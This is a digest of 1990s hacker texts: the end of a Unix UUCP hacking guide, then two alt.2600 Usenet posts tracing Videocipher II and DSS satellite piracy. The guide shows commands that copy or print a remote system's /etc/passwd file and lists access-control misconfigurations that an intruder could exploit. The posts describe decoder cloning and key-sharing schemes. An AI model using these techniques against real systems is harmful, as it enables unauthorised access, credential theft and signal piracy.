and if you=20
wish to contact the system before its status file is purged, you must=
delete=20
its status file.
The files containing the failed transfer request will also remain. If=
you are
using the latest version of System V, these files will be in a subdir=
ectory of
the directory /usr/spool/uucp. For instance, if the system is called =
ripco,=20
the files will be in the directory /usr/spool/uucp/ripco. On other sy=
stems,=20
these files will be in the directory /usr/spool/uucp/C., or /usr/spoo=
l/uucp.=20
These files are in the form:
C.[system name]AAAAAAA
Where [system name] is the name of the system to be contacted, and AA=
AAAA is a=20
the transfer's uucp job number. (You can see the transfer request's j=
ob number=20
by specifying the j option when you initiate the transfer. For exampl=
e,=20
"uucp -j ripco!/etc/passwd /usr/spool/uucppublic/ripcofile" would ini=
tiate the
transfer of the ripco system's password file, and display the job num=
ber on=20
your screen.) Type "cat C.system[jobnumber]", and you will see someth=
ing like=20
this:
R /etc/passwd /usr/pub/.dopeypasswd root -dc dummy 777 guest
On earlier versions of Unix, these files will be in the directory=
=20
/usr/spool/uucp/C. To find the file containing your transfer, display=
the=20
contents of the files until you find the proper one. If your transfer=
fails,=20
delete the transfer request file and the status file, correct any err=
ors in the=20
Systems file or whatever, and try again!
UUCP SECURITY
-------------
=09Obviously, uucp access to files has to be restricted. Otherwise,=
=20
anyone, from any system, could copy any file from the remote system. =
This=20
section will cover the security features of the uucp facilities.
=09The file /usr/lib/uucp/USERFILE contains a list of the directories=
that=20
remote systems can copy from, and local users can send files from to =
remote=20
systems. The entries in this file are in the format:
[local user],[system] [callback?] [directories]
Where:
local user -Is the username of a local account. This is for the =
purpose
=09=09of restricting which directories a local user can send files
=09=09from to a remote system.=20
system -Is the name of a remote system. This is for the purp=
ose of=20
=09=09restricting which directories a specific remote system can
=09=09copy files from.
callback? -If there is a c in this field, then if a transfer re=
quest is
=09=09received from the system indicated in the system field, then
=09=09the local system (in this case, the local system is the system
=09=09which receives the transfer request, rather than the system
=09=09that initiated it) will hang up and call the remote back (at
=09=09the number indicated in the remote's entry in the local's
=09=09Systems file) before starting the transfer.
directories -Is a list of the pathnames of the directories that t=
he remote
=09=09system indicated in the system field can copy files from, or
=09=09the local user indicated in the local user field can send files
=09=09from to a remote system.
A typical entry might look like:
local_dork,ripco - /usr/spool/uucppublic
This means that the user local_dork can only send files to a remote s=
ystem=20
which are in the directory /usr/spool/uucppublic, and the remote syst=
em ripco=20
can only copy files from the local system that are in the directory=
=20
/usr/spool/uucppublic. This is typical: often, remotes are only allow=
ed to copy=20
files in that directory, and if they wish to copy a file from another=
portion=20
of the system, they must notify a user on the system to move that fil=
e to the=20
uucppublic directory. When a transfer request is received from a remo=
te system,=20
the local system scans through the userfile, ignoring the local user =
field (you=20
can't restrict transfers with a particular user from a remote system.=
..the copy=20
access granted to a system in the USERFILE is granted to all users fr=
om that=20
system), until it finds the entry for that system, and if the system =
is allowed=20
to copy to or from that directory, the transfer is allowed, otherwise=
it is=20
refused. If an entry for that system is not found, the USERFILE is sc=
anned=20
until an entry with a null system name (in other words, an entry with=
no system=20
name specified) is found, and the directory permissions for that entr=
y are=20
used. If no entry is found with a null system name, the transfer is d=
enied.
There are a few quirks about USERFILE entries. First, if you have cop=
y access=20
to a directory, you also have copy access to any directories below it=
in the=20
system tree. Thus, lazy system operators, rather than carefully limit=
ing a=20
system's access to only the directories it needs access to, often jus=
t give=20
them copy access to the root directory, thus giving them copy access =
to the=20
entire system tree. Yet another mistake made by careless superusers i=
s leaving=20
the system name field empty in the entries for the local users. Thus,=
if a=20
system that doesn't have an entry in the USERFILE requests a transfer=
with the=20
local system, when the USERFILE is scanned for an entry with a null s=
ystem=20
name, if the entries for the local users come first in the USERFILE, =
the system=20
will use the first entry for a local user it finds, since it has a nu=
ll system=20
name in the system name field. Note, that none of these security feat=
ures even=20
works if the uucp account on the system the transfer is requested wit=
h does not=20
use the uucico shell. In any case, whether the account uses the uucic=
o shell or=20
not, even if you have copy access to a directory, individual file or =
directory=20
protections may prevent the copying. For information on uucp security=
in yet=20
another version of the uucp facilities, see the piece on the Permissi=
ons file=20
in the section on uux security.
EXECUTING COMMANDS ON A REMOTE SYSTEM
-------------------------------------
=09There are 2 commands for executing commands on a remote system- uu=
x and=20
rsh (remote shell- this has nothing to do with the rsh shell [restric=
ted Bourne=20
shell]). This section will cover the uses of both.
UUX
---
=09The uux command is one of the uucp utilities. This is used, not fo=
r=20
file transfers, but for executing non-interactive commands on a remot=
e system.=20
By non-interactive, I mean commands that don't request input from the=
user, but=20
are executed immediately when issued, such as rm and cp. The format i=
s:
uux remote!command line
Where remote is the name of the remote system to perform the command =
on, and=20
the rest (command line) is the command to be performed, and any argum=
ents to=20
the command. You will not receive any of the commnand's output, so th=
is command=20
can't be used for, say, printing the contents of a text file to your =
screen.
UUX SECURITY
------------
=09If the uucp account on the remote system uses the uucico shell, th=
en=20
these security features apply to it.
=09The file /usr/lib/uucp/Commands file contains a list of the comman=
ds a=20
remote system can execute on the system. By remote system, in this ca=
se, I mean=20
the system that the user who initiates the uux command is on, and loc=
al system=20
will mean the system that receives the uux request. Entries in the fi=
le=20
/usr/lib/uucp/Commands are in the following format:
PATH=3D[pathname]
command
command
" to infinity...
command,system
The first line, PATH=3D[pathname], sets the searchpath for the remote=
system=20
requesting the uux execution of a command on the local system. This e=
ntry is=20
just the same as, say, a line in a login file that sets the searchpat=
h for a=20
regular account, example: PATH=3D/bin:/usr/bin
Which sets the searchpath to search first the directory /bin, and the=
the=20
directory /usr/bin when a command is issued. The following entries ar=
e the base=20
names of the programs/commands that the remote can execute on the loc=
al system.=20
The last program/command in this list is followed by a comma and the =
name of=20
the remote site. For example:
PATH=3D/bin
rmail
lp,ripco
Means that the remote system Ripco can execute the rmail and lp comma=
nds on the=20
local system. Usually, only the lp and rmail commands will be allowed=
.
=09Again, we come to another, "different" version of the uucp facilit=
ies.=20
On some systems, the commands a remote system can execute on the loca=
l system=20
are contained in the file /usr/lib/uucp/Permissions. Entries in this =
file are=20
in the form:
MACHINE=3D[remote] COMMANDS=3D[commands] REQUEST=3D[yes/no] SEND=3D[y=
es/no] READ=3D
[directories] WRITE=3D[directories]
Where:
Remote is the name of the remote system. Commands is a list of the co=
mmands=20
the remote may execute on the local system, in the form:
pathname:pathname
For example:
/bin/rmail:/usr/bin/netnews
The yes (or no) aft er "REQUEST=3D" tells whether or not the remote c=
an copy=20
files from the local system. The yes/no after "SEND=3D" tells whether=
or not the=20
remote system can send files to the local system. The list of directo=
ries after=20
"READ=3D" tells which directories the remote can copy files from (pro=
vided that=20
it has REQUEST privileges), and is in the form:
pathname:pathname...etc.
For example:
/usr/spool/uucppublic:/usr/lib/uucp
Again, as before, the remote has copy access to any directories that =
are below=20
the directories in the list in the system tree. The list of directori=
es after=20
"WRITE=3D" is in the same form as the list of directories after "READ=
=3D", and is a=20
list of the directories that the remote can copy files TO on the loca=
l system.
RSH
---
=09This is a new feature which I have seen on a few systems. This is =
not,=20
to the best of my knowledge, a System V feature, but a package availa=
ble for=20
3rd party software vendors. If the rsh command is featured on a syste=
m, the=20
restricted (rsh) Bourne shell will be renamed rshell. Rsh stands for =
remote=20
shell, and is for the execution of any command, interactive or otherw=
ise, on a=20
remote system. The command is executed realtime, and the output from =
the=20
command will be sent to your display. Any keys you press while this c=
ommand is=20
being executed will be sent to the remote system, including breaks an=
d=20
interrupts. The format is:
rsh [system] command line
For example:
rsh ripco cat /etc/passwd
Will print out the /etc/passwd file of the Ripco system on your scree=
n. To the=20
best of my knowledge, the only security features of the rsh command a=
re the=20
individual file and directory protections of the remote system.
UUNAME AND UUSTAT
-----------------
=09These are 2 commands which are for use by users to show the state =
of=20
the local system's uucp facilities. Uuname gives a list of all the sy=
stem names=20
in the Systems (L.sys) file, and uustat gives a list of all pending u=
ucp/uux=20
jobs.
NETWORK MAIL
------------
=09There are several different ways of sending mail to users on other=
=20
systems. First of all, using the uucp and uux commands. Simply edit a=
text file=20
containing the message you wish to send, and uucp a copy of it to the=
remote=20
system. Then send it to the target user on that system using the uux =
command:
uux system!rmail [username] < [pathname]
Where system is the name of the system the target user is on, usernam=
e is the=20
name of the user you wish to send the mail to, and pathname is the pa=
thname of=20
the text file you sent to the remote system. This method works by exe=
cuting the=20
rmail command (Receive Mail), the syntax of which is "rmail [user]", =
and=20
redirecting its input from the file you sent to the remote. This meth=
od will=20
only work if the remote allows users from your local system to execut=
the rmail=20
command.
=09The second method is for systems which feature the remote shell (r=
sh)=20
command. If the remote system can be contacted by your local system v=
ia rsh,=20
type:
rsh system!mail [user]
And once connected, enter your message as normal.
=09This last method is the method of sending mail over uucp networks.=
This=20
method is the one employed by USENET and other large uucp networks, a=
s well as=20
many smaller and/or private networks. This method uses the simple mai=
l command:
mail system!system!system![and so on to infinity]!system@user
Where:
The list of systems is the routing to the target system, and user is =
the mail=20
recipient on the target system. The routing takes a bit of explanatio=
n. Imagine=20
something a uucp network with connections like this:
=09=09=09unix1
=09=09=09 |
=09=09-------------------
=09=09| |
=09 unix2 unix3
=09=09| |
=09 unix4-------------unix5
This network map shows what systems are on the network, and which sys=
tems have=20
entries for which other systems in its Systems (L.sys) file. In this =
example:
Unix1 has entries for unix2 and unix3.
Unix2 has entries for unix1 and unix4.
Unix3 has entries for unix1 and unix5.
Unix4 has entries for unix2 and unix5.
Unix5 has entries for unix3 and unix4.
Now to explain the routing. If unix1 wanted to reach unix5, it couldn=
't do so=20
directly, since it has no means of reaching it (no entry for it in it=
s Systems=20
file). So, it would "forward" the mail through a series of other syst=
ems. For=20
example, to send mail to the user root on unix5, any of these routing=
s could be=20
used:
unix3!unix5@root
unix2!unix4!unix5@root
Obviously, the first routing would be the shortest and quickest. So, =
to mail a=20
message from unix1 to the root user on unix5, you would type:
mail unix3!unix5@root
Then type in your message and press control-D when finished, and the =
uucp=20
facilities will deliver your mail.
ACKNOWLEDGEMENTS
----------------
=09Well, this is it- the end of the file. I hope you've found it=20
informative and helpful. Before I go on, I'd like to thank a few peop=
le whose=20
assistance made writing this file either A: possible or B: easier-
Shadow Hawke I, for sharing many a Unix account with me.
The Warrior (of 312), for helping me get started in hacking.
Omega-- for helping me hack a large network of Unix systems.
Psychedelic Warlord, for helping me with a BSD Unix system.
Shooting Shark, for his C decoy, and more than a few good posts on Pr=
ivate=20
Sector.
Kid&Co, for providing me with some information on the Telnet program.
And lastly but not leastly, Bellcore, Southern Bell, and BOC's around=
the=20
country for the use of their systems. Thanks, all!
-------------------------------------------------------------------
File #3 of 8...
Path: news1.delphi.com!news.delphi.com!uunet!in1.uu.net!news.sprintli=
nk.net!howland.reston.ans.net!news-e1a.megaweb.com!newstf01.news.aol.=
com!newsbf02.news.aol.com!not-for-mail
=46rom: [email protected] (DavidL6587)
Newsgroups: alt.2600
Subject: Scrambling News: DBS hackers encounter CODE 99 (Part 1)
Date: 16 Jul 1995 08:53:08 -0400
Organization: America Online, Inc. (1-800-827-6364)
Lines: 446
Sender: [email protected]
Message-ID: <[email protected]>
Reply-To: [email protected] (DavidL6587)
NNTP-Posting-Host: newsbf02.mail.aol.com
[This is the first of a two-part update on DSS Piracy. It is=20
Copyright 1995 by David Lawson ([email protected])
and Scrambling News. All rights reserved. If you would like a=20
copy of our catalog of video hacker books, simply E-mail or=20
voice 716.871.1915. Your corrections and constructive=20
criticism are appreciated.]
Background
We have entered a new era of digital satellite piracy as
acknowledged by DirecTV's press release of June 16 which
is included in this issue. Many of our new subscribers are
interested in DBS (Direct Broadcast Satellite) and may consider
becoming involved in pirating DBS signals so we will discuss
the dynamics of satellite piracy in this article. The satellite pirac=
y
which most are familiar with is that of Videocipher II and we will
concentrate on that system because there are many lessons to be
learned from it. This is not intended to be a complete history. It is
not our intent to promote piracy,but rather to provide information
for the benefit of our readers.
HBO was a pioneer in the satellite delivery of cable programming.
In 1975 it began transmitting its feeds to cable companies around
the country. Conventional distribution involved shipping videotapes
back and forth. The signals transmitted from communications
satellites at that time had a strength of about 5 watts, which is the
signal strength of a CB band radio, yet those signals had to travel
23,300 miles to earth. By that time they were so weak and noisy
that they had to be amplified thousands of times to be strong
enough to be processed by a satellite receiver. It soon became
obvious to other programmers that satellite delivery was cost
efficient and additionally, it allowed them to offer live events. The
first satellite systems purchased by cable companies cost
$120,000+ but by 1977 imrovements in technology caused the
price to decrease to the $15,000 range.
The first satellite hackers attempted to construct homebrew
systems to intercept HBO's signals and in 1976, using military
surplus and homemade dishes and homemade electronics they
were able to receive HBO. As more programming became
available on satellite more individuals became interested in
obtaining it and businesses began to manufacture equipment.
Improvements in the technology of the components lead to
radical reductions in their cost. A new cottage industry called
TVRO (television receive-only) was born.
By the late '70s "mom and pop" satellite dealerships started
opening up around the country, especially in rural areas not
serviced by cable. Most of the programming available on
satellite at that time was "in the clear." Homeowners who
could afford to spend $6,000-7,000 on a system could
receive free, the same programming being received by the
largest cable companies around the country. They received
HBO, Showtime, TMC, Cinemax, A&E, CNN, WTBS and other
superstations from all around the country and more. The sales
of satellite systems for 1984 were estimated at approximately
750,000.
Dish owners had more entertainment than time to enjoy it but
their benefactors, the programmers, had a problem. They had
invested in satellite delivery of their programming to the
approximately 8,000 cable headends around the country
because it was the most economical means of doing so.
Many cable companies were receiving the programming and
charging their subscribers for it but they were not paying for it
themselves. The programmers decided to secure their signals
in order to prevent the cable companies from pirating them. At
that time there were more than 50 million cable subscribers in
the country and fewer than one million dish owners. Securing
the signals from dishowners was of secondary importance.
The Videocipher II satellite encryption system was designed
by M/A-Com LINKABIT. Designing an encryption system is an
expensive and time consuming proposition. Engineers must trade
off the security features they would like to provide with all the
costs and risks of providing them. In this case M/A-Com opted
to appropriate some of the access control architecture being
employed by the Oak Orion system in Canada. They were later
successfully sued for patent infringement. The VideocipherII
encryption system which they produced was described by
M/A-Com as a state-of-the-art system which was tamperproof
and undefeatable. The VCII (Videocipher II) was touted as the
"only decoder you'll ever need." It employed the "unbreakable"
DES (Data Encryption Standard).
In early January of 1986 dishowners were horrified and dish
sales plummeted as HBO and then the other programmers
scrambled their signals. Most had invested in a satellite system
in the first place because of the free programming which was
available. Now they had to purchase a $300 decoder and pay
for programming. In addition, the subscription rates being=20
charged were almost double what cable companies were=20
charging their customers and cable rates reflected the cost=20
of building a cable plant, running cable to the house and=20
maintaining the system. Dishowners supplied and maintained=20
their own equipment. The signals were already being transmitted=20
for the benefit of the cable companies, the scrambling system had=
=20
been designed for cable use and the only additional expense for=20
programmers in serving the home dish market was in=20
administration. Some programmers did not even offer=20
subscriptions to dishowners because they didn't think it was a
market worth bothering with.
Speculation about vulnerabilities in the VCII encryption system=20
started in March and appeared in the form of a paragraph or two=20
in each monthly issue of Coop's Satellite Digest which was a=20
technical magazine for cable and wireless operators. It was also=20
a monthly chronology of technical improvements in electronic=20
components, dish construction, etc. Bob Coop was one of the=20
original satellite hackers and he was one of the founders of TVRO.
Once a credible source started reporting details of the weaknesses
of the VCII system the scams started. Suddenly it seemed as if
everyone knew someone who had seen a fix though they had not
seen it themselves. A friend drove 600 miles to a remote farmhouse
in the middle of the night. He was going to see a demonstration of a
fix that would turn on all the scrambled channels except the pay-per-
view movie services and he would purchase 100 for $150 each and
pay cash. He would not be allowed to buy only one. One of the
individuals selling the fix soldered the leads of a small epoxied add
on board to the legs of some of the critical chips on the decoder. It
seemed credible. My friend was told that in a few minutes the
channels would be descrambled. In the quietness and suspense as
they waited for the channels to be unscrambled he heard someone
in a distant room calling in a credit card number to subscribe to all
the available channels. Several minutes later the sound and picture
appeared on the TV screen my friend was watching. The fix was
bogus. They simply had the decoder authorized legally by
subscribing to programming. The add-on board was a ruse. My
friend found an excuse to leave.
Another scam was perpetrated by an electronics store in the
Bronx. They had a box which was connected between the decoder
and receiver. It restored audio and video to the encrypted channels.
They had a working demo in their store. It cost $150 and was sold
without a warranty. Observers of the fix noted that it restored video
on all VCII encrypted channels but audio was only available on the
channels which just happened to be offered by the local cable
company. They were actually obtaining the audio from their local
cable company in the Bronx and piping it into the TV. What they
were actually selling was a sync generator which restored only the
video signal. Descrambling the video was relatively easy. It was the
audio that was "hard" encrypted.
The first of three attacks on the VCII system involved an
unsuccessful attempt to duplicate the critical proprietary IC's
through the use of a chip stripper. Then a group euphemistically
referred to as DESUG (Data Encryption Standard Users Group)
attempted to reverse the DES (Data Encryption Standard) algorithm.
This was time consuming and it was not a valid option. The third
attempt involved disassembling the decoder control program which
is stored in the system's EPROM. This approach proved successful
and lead to three major hacks on the system.
The first hack lead to a marketable fix. It was discovered that the
pointer could be redirected to enable decoding on all channels if at
least one channel was subscribed to and this only involved a change
of from one to six bytes, depending on the version of the VCII board.
This hack was known as the three musketeer hack (3M) because it
provided all channels for the cost of one. "One for all and all for o=
ne.
" The three musketeer fix was first demonstrated in September of
1986 and it was put on the market in December. It did not decode
all services or any PPV channels. It was only necessary to replace or
reprogram the system EPROM in order to 3M a box (decoder). The
response of the decoder manufacturer was to epoxy the printed
circuit board making it harder to tamper with. Hair dryers were used
to soften the epoxy and a utility knife was used to chisel it away.
During the period from January of 1986 to December only 40,000
VCII decoders were sold. In the first two weeks after
the musketeer fix was released, another 80,000-100,000, the entire
inventory of VCII's in the country were sold and dish sales picked up
again.
The second hack on the system involved cloning. There are 32=20
bytes of information which make each decoder unique. This=20
consists of four 7 byte seed keys numbered from 0-3 and 4=20
bytes of unit ID. It was discovered that if the unique=20
identification information from a subscribed decoder was=20
programmed into an unauthorized unit, it would decode all the=20
programming subscribed to by the master. This meant that=20
hundreds or even thousands of unauthorized decoders could=20
be cloned to receive the same programming as one decoder
which was subscribed to programming.
About a year after the introduction of the 3M chips, the=20
"wizard" hack, which irrevocably destroyed the system was=20
discovered. One of the early chips which featured this hack=20
was aptly called Doomsday. In addition to the 32 bytes which=20
provides a unique identity for each VCII decoder, there are=20
another 28 bytes transmitted in the data stream which are=20
critical to the decoding function. These bytes are often=20
referred to as public data. Included is a unique service ID=20
and channel identifier for each channel, and a period indicator
which indicates the month the data is valid for. Seven bytes=20
are the authorization mask which identify which services are=20
subscribed to.
The VCII does a series of calculations involving unit ID=20
information and the public data to obtain a working key. We=20
detailed the math in our manual entitled "The Compleat Wizard".=20
It was discovered that this working key was the same for all=20
VCII's of the same series and that this common key turned on=20
all services except the pay-per-view channels. The most=20
amazing thing about the VC II system was that all non-PPV=20
services would be decoded if the correct working key was=20
entered into the correct RAM addresses, and none of the=20
calculations mattered, and it didn't matter whether the VCII=20
was authorized or not or even if the unit ID data was valid. The=20
wizard software which was developed as a result of these=20
discoveries calculated the working key automatically for the=20
current and next month. It's operation was essentially=20
transparent to the user,though it was necessary to enter=20
keys for the pay-per-view movie services like Request=20
TV, First Choice and Action Pay-Per-View manually=20
because their working keys required different calculations..=20
The keys were entered through the keypad on the=20
satellite receiver's remote control.
During the period from 1986 to 1992 dishowners engaged in
piracy would install various fixes on their boards and sooner or
later they would be ECM'd (electronic countermeasures) so their
decoder would be shut off and they would have to purchase new
hardware/software. On average, they might have spent anywhere
=66rom $100-250/year for all programming including pay-per-view
and special events. Subscribing to all the programming would
have cost several times that amount.
There was an-going ECM program which was operated by G.I.
(General Instrument) after they bought out M/A-Com. When the
first 3M fixes were used in 1986 it was not known that the box=20
ID was stored in two locations. A message was sent in the data
stream to decoders to compare the ID's in both locations. If they
did not match the box was shut off. VCII's suspected of being
clone masters would be shut off on the grounds that they were
oversubscribed. When wizard technology became predominant
ECM's involved changing channel ID information, assigning
multiple services to the same tier bit, etc. The commercial
decoders used by cable companies could recognize the
difference but residential models could be shut off. Hackers
monitored the datastream on certain channels and they were
able to observe ECM's being tested. This often allowed them to
modify software and hardware fixes and have them ready to
sell before an ECM was actually employed.
Most dishowners had their dishes installed and their decoders
modified by a satellite dealer who kept their system running so
they did not have to be aware of the latest ECM's or fixes. They
didn't have to rely on any satellite dealer though and they didn't
have to be an electronics expert to keep their VCII descrambling
satellite delivered programming. An entrepreneur started a
magazine callled the Blank Box Newsletter. The sole purpose of
that magazine was to provide advertising space for those selling
the latest fixes because they could not buy space elsewhere. It
was devoid of editorial content. Every month the advertisers
featured the latest pirate products and services. The pirate
products available ranged from how-to videotapes to seed key
pullers, hardware/software fixes for all models of VCII boards,
DES calculator software, VCII emulator software, etc. A list of
the advertisers in the magazine was a list of who had been
busted. Anyone capable of plugging in a chip or soldering could
follow the instructions which accompanied the latest chip or
hardware fix. If they couldn't do it themselves, there were a half-
dozen businesses they could overnight their descrambler to, and
most of them provided excellent service. The name Blank Box
Newsletter was discovered to be a copyright infringement so the
name was changed to Satellite Watch News.
Dishowners did not even have to subscribe to a magazine to be
kept abreast of the latest techniques for pirating satellite=20
television.They could watch it on their satellite systems. The=20
patron saint of satellite dealers is the late Shawn Kenny. He=20
used the medium itself. From a makeshift studio located at his=20
New Jersey satellite dealership he produced a weekly show=20
called Boresight and he rented time on whatever satellite had=20
space available. It wasn't very expensive. He was another of the=20
pioneers. He hated scrambling and considered the VCII to be a=20
piece of junk. His motto was "a (decoder) module in every home."=20
His show included satellite news, tech tips for dish dealers=20
some kibitzing and a segment called "Yellow Rain (Piss on=20
the VCII)." He had an encyclopedic know ledge of satellite=20
equipment and when he was demonstrating components he=20
considered inferior he would place them on a block and smash=20
them to pieces. In the Yellow Rain segment he
delighted in showing programmers the latest means by which
their programming was being stolen. Fixes were demonstrated
and guests explained in exquisite detail how to pull seed keys
=66rom a decoder or adapt certain fixes to different versions of
the decoder. Someone found a set of schematics and
technical information about the VCII allegedly in a dumpster
behind General Instrument's manufacturing facility. They
were marked confidential. Shawn was ecstatic. He copied
and sold them as a package every week along with his
other products. At one point G.I. sued him and got a
$625,000 judgment against his company but they were
never able to collect.
One of the more amazing hacks which was shown on
Boresight was the Parasite board. It illustrated just how
completely the Videocipher II was understood by the hackers.
It was a Videocipher II clone built with non-proprietary
components. To make it function it was only necessary to load
it with unit ID data. It was a precursor of the SUN (Secure
Universal Norm) decoder. Unlike the Videocipher II which uses
an embedded secure processor, the SUN used a detachable
secure processor. It was a plain vanilla decoder which could
be programmed to emulate a VCII, Oak, or B-MAC and it
could be reprogrammed in case of a security breach. When
SUN boards were first introduced they were 2 years ahead
of pirate VCII technology. They stored two clone ID's and
had wizard back up for 8 different working keys and they
countered a variety of ECM's years before they were actually
employed. The only crime worse than using a Videocipher II
decoder to steal satellite delivered programming was to steal
it without using a Videocipher II decoder. General Instrument
sued Dectec,manufacturer of the SUN, on the grounds that
the SUN used the Videocipher II operating system.Dectec
denied it. Their operating and data transfer system was
encrypted using a Dallas SIP Stik which provides the same
level of security used by the banking industry to protect their
data. G.I. was not able to prove their case in Canadian courts
though they did effectively cripple the company.
By 1992 General Instrument started to take control of its
system. It established a swap out program to issue VCII
PLUS units to legitimate subscribers with untampered decoders.
Instead of a common key which turned on all services except
the PPV's each service now had its own unique working key
but it was still a common key which worked in all residential
decoders. Instead of entering a 20 digit monthly key which
would turn on all the basic services, it became necessary to
enter 20 digits for each of the 60 or so channels available.
Then the keys started changing more frequently, with some
changing weekly and then daily. This led to the development
of modem based fixes which would allow the user to simply
press a button on their remote control which would cause the
modem to call a BBS and download the latest working keys
into the RAM of the Videocipher board. This worked for a while
but other ECM's made it necessary to make frequent software
and hardware changes. In addition, many individuals were
paying for long distance charges to a BBS in order to download
the keys. When the movie channels like HBO and Showtime
moved to the VCII PLUS system, most dishowners abandoned
piracy because they could no longer get the channels they really
wanted and the cost of piracy was higher than the cost of
subscribing to the channels which were still available.
The pirates established a sophisticated computer network in
order to obtain and distribute working keys. It consisted of a
central computer connected in real time to a number of
satellite dishes around the country. The dishes were program
med to receive monthly hit data and then move to another
channel. That data was then sent from the central computer,
again in real time, to several nodes positioned around the
country. Local satellite dealers received their monthly data
=66rom the node computers so consumers in many cases only
had to make a local phone call to a BBS operated by a local
satellite dealer. The working keys for some services were
obtained from the commercial VCII decoders installed at
cable companies around the country by the technicians who
maintained them.Data necessary to calculate the working key
was only sent occasionally, so decoders dedicated to one
service like those at cable headends did not miss it. Once
obtained, the keys would be posted on BBS's across the country.
G.I. tried to determine the location of these compromised
commercial decoders by sending bogus data and watching
the working keys posted on the BBS's. They could take that
informatiion, calculate the box ID from it and they would know
which cable headend it was installed at. This lead to
co-operation among the various BBS's to stop posting working
keys until they were verified, so they would not jeopardize the
individuals who obtained them. Some individuals were charged,
nevertheless.
When G.I. did finally start to shut off massive numbers of
pirate decoders they did so with almost mathematical precision.
They knew what fixes were available for each model of their
decoder and how many dishowners were using each. They shut
them down sequentially so their production facilities and
pipeline were not overloaded because they also knew how
many VCII PLUS boards they would sell to those who had
been shut off. It is interesting that the devastatingly effective
rounds of ECM's which occurred at the very end of VCII piracy
could have been done years before.
The era of Videocipher II piracy has ended. The "de facto"
encryption standard was also the world's most hacked
scrambling system. Until very recently it was possible to=20
pirate two dozen or so services. In the last few weeks the
working keys have been changing every few hours.=20
The fatal flaws in the encryption system are not
lost on those designing today's systems. The access control=20
system was left in the open where it was easily
accessed. It employed an embedded secure processor which
could not be changed when there was a breach of security and
the the control data could be modified.
It took General instrument 7 years to secure its encryption
system. An article in one of the satellite trade magazines a
couple of years ago estimated that over the years General
Instrument had made a profit of about $800,000 million strictly
=66rom piracy. Many believe that G.I. itself released details of
its system so it would be hacked. With all the security
features the system employed it had a wide-open back door.
In 1987 G.I. claimed it had manufactured 300,000 decoders but
independent sources with access to information from omponent
suppliers claimed that 1.3 million had been produced. The
number of authorized decoders was only ever a small fraction
of the production figures. It was discovered that over 400,000
had been shipped to Canada at a time when it was illegal for
Canadians to own them. Hundreds of thousands more were
illegally shipped to Mexico and the Caribbean.
Today, there are 2.3 million subscribed VCII PLUS decoders in
the country. HBO has well over a million paying subscribers.
Some speculate that VCII piracy was tolerated in order to
sustain the growth of the satellite business. They believe that
if the system had not been hacked it is unlikely the industry
would have achieved the growth it has had.To the best of our
knowledge no dishowner in this country has ever been charged
with pirating satellite delivered programming but those who mod-
ified the decoders were. Hundreds of satellite dealers lost their
businesses, families, homes and liberty. During the heyday of
VCII piracy it was so pervasive that dealers who were selling
satellite systems and subscription programming simply could not
compete with dealers who sold systems with free programming.
By the same token it is difficult for a secure encryption system
to compete against one which is hacked when the public has
the choice of which system to purchase.
We have now entered the age of digital compressed satellite
programming and all analog systems are converting. Because
of compression it is possible to put several channels on a
transponder which now only carries one. The savings for
programmers far outweigh the astronomical cost of the
necessary equipment. For some consumers, a pirate smart
card which would provide access to all DirecTV programming
would be a dream come true. It may happen, despite what
now appears to be a fortress of security features built into
the system.
[In part two we focus on existing DSS piracy DSS hackers=20
discover Code 99.]
END PART 1 OF 2 PARTS
-------------------------------------------------------------------
File #4 of 8...
Path: news1.delphi.com!news.delphi.com!uunet!in1.uu.net!news.sprintli=
nk.net!howland.reston.ans.net!news-e1a.megaweb.com!newstf01.news.aol.=
com!newsbf02.news.aol.com!not-for-mail
=46rom: [email protected] (DavidL6587)
Newsgroups: alt.2600
Subject: Scrambling News: DBS Hackers Encounter CODE 99 (Part 2)
Date: 16 Jul 1995 08:53:09 -0400
Organization: America Online, Inc. (1-800-827-6364)
Lines: 434
Sender: [email protected]
Message-ID: <[email protected]>
Reply-To: [email protected] (DavidL6587)
NNTP-Posting-Host: newsbf02.mail.aol.com
[This is the second of a two part update on DSS piracy. It is=20
copyright 1995 David Lawson ([email protected]) and=20
Scrambling News. All rights reserved. E-mail or voice=20
716.874.2088 for a free product catalog of hacker books.=20
Your corrections and constructive criticisms are appreciated.]
DSS Hackers Encounter Code 99
The DSS System
The DSS system rolled out nationally last September and in
less than a year it has acquired about 650,000 subscribers.
There are two more DBS systems ready to launch. The dish
size, ease of installation, low maintenance and up-front cost
of the systems are major reasons for the faster sales of DSS.
The DSS scams have started. It is July 6, 1995 and there are
no fixes for the system available other than gray marketing
as we have discussed. A business callled Test Card is how
ever, advertising that they are looking for dealers and
distributors for a DSS test card. Someone else has a package
for $29.95 which describes how to get $1000 worth of program
ming for $50/yr. "Don't miss out on this hot new information
package." No one we know who has responded to these ads
has received anything back yet. There may also appear in=20
the next few months DSS bibles, software packages which will=20
likely consist of the various pirate programs and source code=20
used to break the European version of Videocrypt. They will=20
probably originate from Johm Mc Cormac's Special Projects=20
BBS which is a repository for Videocrypt information. There=20
may also be bogus DSS reader/writer software and a PC=20
interface. The data structure is non-standard. A working PC=20
interface for this system is complex and very expensive.
The DSS system employs a digital and far more secure version
of the Videocrypt encryption system which is used in Europe. It
is a smartcard system which employs a detachable secure
processor. If security is breached, the smartcard is replaced.
The European system has just issued its tenth series of smart
cards. All previous series have been hacked. Europeans can
walk into shops and purchase the latest pirate smartcard or
order by mail. Services using Videocrypt are only authorized for
specific countries so those in other countries can purchase
pirate smartcards with impunity. They typically work for 6=20
months or a year and cost $150. Inevitably they are shut off=20
and the users wait a month or so until the next version is ready.
A rumour is that John Grayson's chief engineer at Dectec has
been hired by a Western Canadian group working on DSS.
He designed the SUN board. Supposedly there are 10
members of the group and each has contributed $50,000 to
the project. John Grayson was recently spotted at a Cable
Show in Europe and has moved on to other projects. This
means there are now two separate groups working to
develop a marketable fix for DSS. The existing work done
on the system has involved a consortium of U.S. and
European engineers. The Europeans have years of
experience with Videocrypt and there are now several
groups with expertise to work on the system..
Anyone trying to reverse engineer the smartcard will encounter
the nefarious code 99. The card developed by RCA and
Motorola can be rendered useless by hi-frequency, low
voltage, temperature and other types of probing. Any type of
tampering results in erasure of the micro code in the EEPROM
and sets the card to code 99, rendering it absolutely useless.
The smartcard which has been developed for the DSS system
is, at this moment in time, impervious to all known methods of
hacking. In addition, code can be reprogrammed on-the-fly,
every 29 seconds. Reprogramming was used in the 09 series
smartcards in Europe which increased their longevity, although
they eventually had to be replaced anyway.
Just as hacking the Videocipher II system never involved
breaking the DES, hacks for the DSS system do not necessarily
involve being able to reverse engineer the smartcard. The fix to
be released will probably involve reprogramming the card to
add existing services to those already being paid for, including
